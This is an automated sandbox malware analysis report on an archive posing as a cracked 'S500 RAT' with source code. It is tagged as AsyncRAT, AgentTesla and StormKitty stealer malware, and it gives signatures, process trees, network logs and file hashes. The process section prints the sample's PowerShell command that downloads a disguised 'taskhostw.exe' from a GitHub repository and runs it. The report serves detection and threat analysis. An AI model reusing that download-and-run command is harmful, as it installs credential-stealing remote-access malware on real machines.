Malware Analysis Report

2024-10-10 10:39

Sample ID 240320-vxlxtaeg8s
Target S500 RAT Cracked + Source .rar
SHA256 54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Tags
upx asyncrat default rat agilenet identifier stormkitty arrowrat agenttesla spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff

Threat Level: Known bad

The file S500 RAT Cracked + Source .rar was found to be: Known bad.

Malicious Activity Summary

upx asyncrat default rat agilenet identifier stormkitty arrowrat agenttesla spyware stealer

StormKitty

Async RAT payload

StormKitty payload

Asyncrat family

Agenttesla family

AgentTesla payload

AsyncRat

Arrowrat family

Stormkitty family

Contains code to disable Windows Defender

Async RAT payload

Blocklisted process makes network request

Executes dropped EXE

UPX packed file

Checks computer location settings

Loads dropped DLL

Obfuscated with Agile.Net obfuscator

Reads user/profile data of web browsers

Looks up geolocation information via web service

Looks up external IP address via web service

Drops desktop.ini file(s)

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies registry class

Modifies Internet Explorer settings

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Checks processor information in registry

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-20 17:23

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Arrowrat family

arrowrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:47

Platform

win10v2004-20240226-en

Max time kernel

1287s

Max time network

1172s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings C:\Program Files\7-Zip\7zFM.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3316 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 3316 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4228 wrote to memory of 4556 N/A C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe C:\Windows\system32\cmd.exe
PID 4228 wrote to memory of 4556 N/A C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe C:\Windows\system32\cmd.exe
PID 4556 wrote to memory of 3460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4556 wrote to memory of 3460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4556 wrote to memory of 5036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 5036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4556 wrote to memory of 844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 4556 wrote to memory of 844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 4516 wrote to memory of 3736 N/A C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe C:\Windows\system32\cmd.exe
PID 4516 wrote to memory of 3736 N/A C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe C:\Windows\system32\cmd.exe
PID 3736 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3736 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3736 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
PID 3736 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe
PID 3736 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 3736 wrote to memory of 2916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 3672 wrote to memory of 1252 N/A C:\Program Files\7-Zip\7zFM.exe C:\Windows\system32\NOTEPAD.EXE
PID 3672 wrote to memory of 1252 N/A C:\Program Files\7-Zip\7zFM.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E61B.tmp\E61C.tmp\E61D.bat "C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 67.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\Form4.resx

MD5 0a4e049a213aef04a4b1fa145a76a752
SHA1 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1
SHA256 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f
SHA512 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\Forms\FormDOS.resx

MD5 5c43b1a8ce131be5e8271794ec520a54
SHA1 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a
SHA256 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153
SHA512 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources

MD5 beda8bbd2a72e45431cf5dd68f7c6e61
SHA1 18e28ada040e4c62e33d946046a9ccf66f839f0d
SHA256 f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c
SHA512 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources

MD5 fa80841e3dc9ffb31dd5d015c1030172
SHA1 aa0d9e66db2a8528edf9931fe132f18870307216
SHA256 a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9
SHA512 a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets

MD5 3d9ef7c4c2db6e7631832825418a9ba6
SHA1 b2ac00b06d61c8498914ea52eaedaab01fae1a21
SHA256 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7
SHA512 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035

C:\Users\Admin\AppData\Local\Temp\7zE85E26919\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props

MD5 3108edc3f74d08bec485f1fc0aabab5b
SHA1 e1e14322ab3e69a69a7b0c9efd5b845a112320b8
SHA256 e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584
